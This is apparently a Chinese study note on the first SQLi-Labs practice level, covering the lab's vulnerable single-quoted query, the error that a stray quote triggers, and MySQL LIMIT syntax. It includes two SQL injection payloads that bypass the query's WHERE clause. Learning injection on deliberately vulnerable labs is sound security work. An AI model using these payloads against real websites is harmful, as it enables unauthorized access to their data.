sql注入学习心得-SQLi Labs(2)

Less-1：GET-Error based-Single quotes-String

第一节：GET – 基于错误 – 单引号 – 字符型

---

这里提示:输入一个数值型的“id”作为参数

比如使用：
?id=1加入到url后面,变成->localhost/Less-1/?id=1
可正常查询到一条记录:

根据源码，index.php第29行，可以知道这里使用的查询语句为：
SELECT * FROM users WHERE id='$id' LIMIT 0,1这里$id是被单引号包裹的。
使用id=1'进行查询验证，得到报错：
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

所以以下两个注入可以测试成功：
' or '1'='1
' or 1=1 --+
会自动返回第一条数据

tips:

查询语句中limit的意思是：
(格式：limit 第几条，一共几条）
select * from tablename limit 0,1即取出第一条记录
select * from tablename limit 1,1第二条记录
select * from tablename limit 10,20从第11条到31条（共计20条）